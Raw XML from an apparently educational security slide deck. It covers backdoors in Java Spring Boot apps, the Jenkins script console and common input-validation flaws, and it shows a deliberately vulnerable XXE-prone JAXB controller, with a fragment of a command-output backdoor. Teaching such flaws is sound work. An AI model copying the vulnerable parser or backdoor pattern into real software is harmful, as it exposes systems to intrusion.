              <a:t>process.getInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>        return output;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11475-8DA3-187B-364A-8D74081CAADB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="3314759"/>
            <a:ext cx="2113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sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hypothetical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Springboot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7955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CD0F-0376-9C55-A06D-51BB8AF3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Looks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Stupidly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>deliberatly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>?) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Unsafe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happen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in real life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AEF78-21BF-CA46-F21F-63011F01FEA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463935" y="2347912"/>
            <a:ext cx="1029326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1/  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>classical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  scenario :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>practical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> code in DEV,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>deployed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> in PROD... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>should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protected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>       @RequiredRole("ROLE_ADMIN")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>   But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>sometimes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not, or not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>enough</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>revealed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2/  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> are not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>aware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>3/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>someone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> code by putting "backdoor" in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> CI/CD or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>dependencies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4/ the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>practical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>years</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>protected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> by a ROLE. You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>forgot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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>     By re-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>granting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> a permission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>later</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>,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forgot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>impacted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>piece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> of code 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331624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8983B-27E6-E98C-BC44-14D75D8D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0100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Example of Scripting Helper : Jenkins CI/CD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33794" name="Picture 2" descr="Mastering Jenkins: Making Bulk Updates to Jobs | Early and Often">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3676C642-3FB3-2D76-8D81-2141A55FA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509588"/>
            <a:ext cx="7632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58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DBAFE-C789-8CA6-D5B7-3C7165FB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9375"/>
            <a:ext cx="11639550" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Personal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  /  On-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Premise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  /   Public Cloud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Private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Cloud)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="Vue de dessus du portable Lenovo ThinkBook 16 Gen 6, montrant le menu Démarrer de Windows 11 à l’écran, le clavier et les ports du côté droit.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBFB8593-B47F-F54F-3F14-4805467C3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24" y="1359694"/>
            <a:ext cx="3206326" cy="257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9E3238C9-2536-E01D-B115-6E81619B5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98" y="4235450"/>
            <a:ext cx="211006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Survey: On-Prem Data Centers Lowest Investment Priority for IT Shops | Data  Center Knowledge | News and analysis for the data center industry">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5DEA91D-F9B9-920F-1691-F8ED03CF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158" y="1829662"/>
            <a:ext cx="3151630" cy="163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 descr="Quanta to ship high-density JBOD storage system - DCD">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF6D8AA7-29D0-2F5E-3AE7-5FFB30DDB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32" y="4171950"/>
            <a:ext cx="3749686" cy="218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Public Cloud Deployment, What is a Public Cloud? | OC Cloud9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D703AD5-13A4-EA0B-6299-A25EDB7E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138" y="1614222"/>
            <a:ext cx="3681541" cy="173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4" name="Picture 22" descr="A quoi ressemble un data center Google ? - Cyrès">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181F4F68-ED29-2D13-A632-996AAD4C9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1" y="3990976"/>
            <a:ext cx="3420932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334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1A827-F025-F01E-BBED-46ACC08A6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44" y="0"/>
            <a:ext cx="12025312" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Jenkins CI/CD : Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>controlled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Administer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>" permission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3D2A2-5031-E00B-88EA-80BFA9EBA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52" y="1637848"/>
            <a:ext cx="11488146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10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200B0-4815-FE05-15D7-E5FD84694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418F-A3F0-6C7B-81DD-5C456132F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6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Common "Input Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/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5C276-EBCA-F9AE-A0D7-F2FCF675E76A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243389" y="1714501"/>
            <a:ext cx="4513864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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Traversal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Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> (XXE) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Deserialization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etc...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D3DD67-4355-EC0D-B823-BB9D1D715BA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686175" y="1619249"/>
            <a:ext cx="5581650" cy="28527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6C0C6B-0036-BC2A-6274-566235C96338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786187" y="5338762"/>
            <a:ext cx="5481638" cy="13646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408399E-85B3-1567-5F34-67B5DB9D8512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3128962" y="4633911"/>
            <a:ext cx="657225" cy="4333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2676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D4F91-FF35-56CE-E098-632E1BF34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sz="4400" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> (XXE) [1/3] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Vulnerability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BEEE7-4665-15C9-F9FA-1EAF7E696323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2428875" y="1406664"/>
            <a:ext cx="9288568" cy="4985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@RestController</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>XmlController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    @PostMapping("/parseXml")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>parseXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(@RequestBody </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xmlData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>JAXBContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>jaxbContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>JAXBContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>.newInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>XmlData.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Unmarshaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>unmarshaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>jaxbContext.createUnmarshaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>XmlData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> data = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>XmlData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>unmarshaller.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>unmarshal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>StringReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xmlData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>            // ... process data          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>            return "XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>parsed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>successfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>        } catch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>JAXBException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>            return "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> XML: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>e.getMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR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4219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4080-2379-5509-93FB-170F1C28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sz="4400" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> (XXE) [2/3] : Attack &amp; Risk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6E119-B770-C394-0DBD-A959BB6A1CF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3691271" y="1628775"/>
